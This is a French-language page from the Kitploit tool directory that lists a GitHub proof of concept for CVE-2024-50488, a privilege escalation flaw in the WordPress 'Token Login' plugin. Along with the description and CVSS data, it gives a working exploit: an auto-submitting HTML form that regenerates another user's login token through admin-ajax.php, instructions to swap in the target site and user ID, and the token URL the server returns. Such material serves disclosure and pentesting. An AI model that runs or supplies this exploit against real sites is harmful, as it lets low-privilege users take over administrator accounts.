Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - Élévation de privilèges par un utilisateur authentifié (Subscriber+) | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-50488
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - Élévation de privilèges par un utilisateur authentifié (Subscriber+)

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50488

Token Login <= 1.0.3 - Élévation de privilèges authentifiée (Abonné+)

Description :

Le plugin WordPress de connexion automatique via une URL sécurisée avec jeton, avec restriction de connexion par rôle, est vulnérable à une élévation de privilèges par prise de contrôle de compte dans toutes les versions jusqu'à la 1.0.3 incluse. Cela est dû au fait que le plugin ne vérifie pas correctement si un utilisateur dispose des permissions nécessaires pour générer un jeton de connexion pour d'autres utilisateurs. Cela permet à des attaquants authentifiés, ayant au moins un accès de niveau abonné, de se connecter en tant qu'autres utilisateurs, y compris les administrateurs.

Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login

Preuve de concept

Connecté, exécutez cette soumission HTML. Remplacez l'URL par celle du site WordPress sur lequel vous êtes connecté. Remplacez l'ID par celui de l'utilisateur pour lequel vous souhaitez générer le jeton. Copiez l'URL et vous pourrez vous connecter comme cet utilisateur.

<html>
  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />
      <input type="hidden" name="method" value="regenerate&#95;token" />
      <input type="hidden" name="user&#95;id" value="7" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Réponse

{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}
Télécharger l’outil